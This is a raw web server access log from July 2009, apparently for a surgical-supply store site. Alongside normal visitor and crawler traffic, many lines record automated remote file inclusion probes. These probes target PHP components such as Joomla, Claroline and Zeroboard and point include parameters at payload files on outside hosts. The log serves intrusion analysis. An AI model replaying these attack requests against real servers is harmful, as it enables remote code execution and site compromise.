90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:40 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
200.80.241.115 - - [12/Jul/2009:05:19:43 -0400] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
90.207.42.53 - - [12/Jul/2009:05:19:50 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):QSEARCH+IRADIO(A0010):D+QSRKEY(A0300):BONE CLAMP" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:51 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:51 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:51 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
90.207.42.53 - - [12/Jul/2009:05:19:51 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
200.80.241.115 - - [12/Jul/2009:05:19:59 -0400] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
200.80.241.115 - - [12/Jul/2009:05:19:59 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
216.120.237.150 - - [12/Jul/2009:05:20:06 -0400] "GET /logs/access_log.Q109070800//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
91.121.89.135 - - [12/Jul/2009:05:20:15 -0400] "GET //config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:05:20:15 -0400] "GET /logs//config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
91.121.89.135 - - [12/Jul/2009:05:20:15 -0400] "GET /logs/access_log.Q109070300%20%20//config/dbutil.bck.php?confdir=http://206.126.97.21/~talagaho/id.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:05:20:18 -0400] "GET /logs/access_log.Q109061700//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:20:18 -0400] "GET /logs/access_log.Q109052700//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.79"
216.120.237.150 - - [12/Jul/2009:05:20:46 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:05:20:46 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
216.120.237.150 - - [12/Jul/2009:05:20:46 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
94.163.31.233 - - [12/Jul/2009:05:21:25 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
94.163.31.233 - - [12/Jul/2009:05:21:25 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
94.163.31.233 - - [12/Jul/2009:05:21:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
94.163.31.233 - - [12/Jul/2009:05:21:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
209.59.12.99 - - [12/Jul/2009:05:22:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.80.241.115 - - [12/Jul/2009:05:22:26 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.128.135.52 - - [12/Jul/2009:05:23:51 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:23:51 -0400] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:23:51 -0400] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
94.163.31.233 - - [12/Jul/2009:05:23:57 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
94.163.31.233 - - [12/Jul/2009:05:23:57 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
216.120.237.150 - - [12/Jul/2009:05:24:01 -0400] "GET /logs/access_log.Q109070800//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
94.163.31.233 - - [12/Jul/2009:05:24:02 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
94.163.31.233 - - [12/Jul/2009:05:24:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6)"
200.80.241.115 - - [12/Jul/2009:05:24:13 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
216.120.237.150 - - [12/Jul/2009:05:24:51 -0400] "GET /logs/access_log.Q109062100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
200.80.241.115 - - [12/Jul/2009:05:25:05 -0400] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
62.128.135.52 - - [12/Jul/2009:05:26:31 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:26:32 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:26:32 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:05:27:00 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.120.237.150 - - [12/Jul/2009:05:27:48 -0400] "GET /logs/access_log.Q109062100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
62.128.135.52 - - [12/Jul/2009:05:27:48 -0400] "GET /logs/access_log.Q109062100//index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:29:41 -0400] "GET /logs/access_log.Q109062100//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.249.68.70 - - [12/Jul/2009:05:30:54 -0400] "GET /logs/error_log.Q108061500 HTTP/1.1" 404 223 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.80.241.115 - - [12/Jul/2009:05:31:00 -0400] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.808gaming.com/themes/id.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
209.59.12.99 - - [12/Jul/2009:05:32:01 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.254.241.12 - - [12/Jul/2009:05:32:32 -0400] "GET //claroline/tracking/userLog.php?rootSys=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:05:32:33 -0400] "GET /logs/access_log.Q109052900//claroline/tracking/userLog.php?rootSys=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 256 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:05:32:34 -0400] "GET /logs//claroline/tracking/userLog.php?rootSys=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
72.30.142.177 - - [12/Jul/2009:05:33:31 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.177 - - [12/Jul/2009:05:33:31 -0400] "GET /logs/error_log.Q109070800 HTTP/1.0" 200 2844195 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.177 - - [12/Jul/2009:05:33:33 -0400] "GET /logs/error_log.Q109070800 HTTP/1.0" 200 2844195 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.200.199.144 - - [12/Jul/2009:05:34:43 -0400] "GET //?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:05:34:43 -0400] "GET /logs//?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 200 9195 "-" "Mozilla/5.0"
114.200.199.144 - - [12/Jul/2009:05:34:43 -0400] "GET /logs/access_log.Q109052500%20%20//?_zb_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.68.70 - - [12/Jul/2009:05:35:55 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L013410490FE426006D61011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [12/Jul/2009:05:37:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.182.124.148 - - [12/Jul/2009:05:37:31 -0400] "GET //plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 239 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:05:37:33 -0400] "GET /logs//plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:05:37:35 -0400] "GET /logs/access_log.Q109061800//plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:05:39:41 -0400] "GET /logs/access_log.Q109062800//plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 266 "-" "libwww-perl/5.813"
209.59.12.99 - - [12/Jul/2009:05:42:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
193.254.241.12 - - [12/Jul/2009:05:42:40 -0400] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:05:42:41 -0400] "GET /logs/access_log.Q109052700//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:05:42:43 -0400] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
62.128.135.52 - - [12/Jul/2009:05:45:16 -0400] "GET /logs/access_log.Q109051000//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:45:16 -0400] "GET //modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jul/2009:05:45:16 -0400] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
193.254.241.12 - - [12/Jul/2009:05:45:28 -0400] "GET /logs/access_log.Q109051800//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
64.182.124.148 - - [12/Jul/2009:05:45:44 -0400] "GET //httpdocs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 269 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:05:45:47 -0400] "GET /logs//httpdocs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.813"
64.182.124.148 - - [12/Jul/2009:05:45:51 -0400] "GET /logs/access_log.Q109061800//httpdocs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
193.254.241.12 - - [12/Jul/2009:05:45:58 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
193.254.241.12 - - [12/Jul/2009:05:45:59 -0400] "GET /logs/error_log.Q109051500//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
62.128.135.52 - - [12/Jul/2009:05:46:59 -0400] "GET /logs/error_log.Q109060700//modules/xfsection/modify.php?dir_module=http://www.goldstrategie.ch/images/inv?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
209.59.12.99 - - [12/Jul/2009:05:47:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.70 - - [12/Jul/2009:05:47:32 -0400] "GET /images/items/0034300_thumb.jpg HTTP/1.1" 200 1648 "-" "Googlebot-Image/1.0"
66.11.230.36 - - [12/Jul/2009:05:47:47 -0400] "GET //include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:47:47 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:47:47 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:48:15 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
213.92.85.176 - - [12/Jul/2009:05:48:24 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:48:24 -0400] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:48:24 -0400] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
64.182.124.148 - - [12/Jul/2009:05:48:39 -0400] "GET /logs/access_log.Q109062800//httpdocs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 296 "-" "libwww-perl/5.813"
213.92.85.176 - - [12/Jul/2009:05:49:38 -0400] "GET /logs/access_log.Q109060500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:49:56 -0400] "GET /logs/error_log.Q109051300//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
213.92.85.176 - - [12/Jul/2009:05:49:58 -0400] "GET /logs/access_log.Q109051500//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://poisongame.altervista.org/pr.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.254.32.2 - - [12/Jul/2009:05:50:00 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:50:00 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:50:00 -0400] "GET //include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.150.78.235 - - [12/Jul/2009:05:50:12 -0400] "GET ///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
218.150.78.235 - - [12/Jul/2009:05:50:12 -0400] "GET /logs/access_log.Q109051100///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.150.78.235 - - [12/Jul/2009:05:50:12 -0400] "GET /logs///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:05:50:22 -0400] "GET /logs/access_log.Q109070800%20%20//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:50:36 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
218.150.78.235 - - [12/Jul/2009:05:52:10 -0400] "GET /logs/access_log.Q109053000///?_zb_path=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:52:25 -0400] "GET /logs//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:52:25 -0400] "GET /logs/access_log.Q109052200%20%20//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:52:25 -0400] "GET //include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:52:57 -0400] "GET /logs/access_log.Q109061700%20%20//include/lib.inc.php?site_path=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:05:53:06 -0400] "GET /logs/error_log.Q109062600///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:05:53:07 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
147.123.157.1 - - [12/Jul/2009:05:53:06 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9196 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jul/2009:05:53:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
140.117.120.161 - - [12/Jul/2009:05:55:22 -0400] "GET /logs/access_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP= HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:55:22 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP= HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:55:23 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootP= HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
147.123.157.1 - - [12/Jul/2009:05:55:23 -0400] "GET /logs/access_log.Q109060100///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
140.117.120.161 - - [12/Jul/2009:05:55:23 -0400] "GET /logs/error_log.Q109050700//PhpLinkExchange/bits_listings.php?svr_rootP= HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:56:20 -0400] "GET /logs//ashnews.php?pathtoashnews= HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:56:20 -0400] "GET //ashnews.php?pathtoashnews= HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:56:20 -0400] "GET /logs/error_log.Q109061000//ashnews.php?pathtoashnews= HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
140.117.120.161 - - [12/Jul/2009:05:56:21 -0400] "GET /logs/access_log.Q109061000//ashnews.php?pathtoashnews= HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
66.11.230.36 - - [12/Jul/2009:05:57:10 -0400] "GET //modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:57:15 -0400] "GET /logs//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:57:15 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:57:27 -0400] "GET //modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:57:27 -0400] "GET /logs/access_log.Q109053100%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:57:27 -0400] "GET /logs//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
124.0.145.1 - - [12/Jul/2009:05:58:01 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.11.230.36 - - [12/Jul/2009:05:58:06 -0400] "GET /logs/access_log.Q109070800%20%20//modules/errors.php?error=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
65.254.32.2 - - [12/Jul/2009:05:58:11 -0400] "GET //modules/errors.php?error=http://www.smilewig.com/bbs/chase/images/remember.txt????????? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
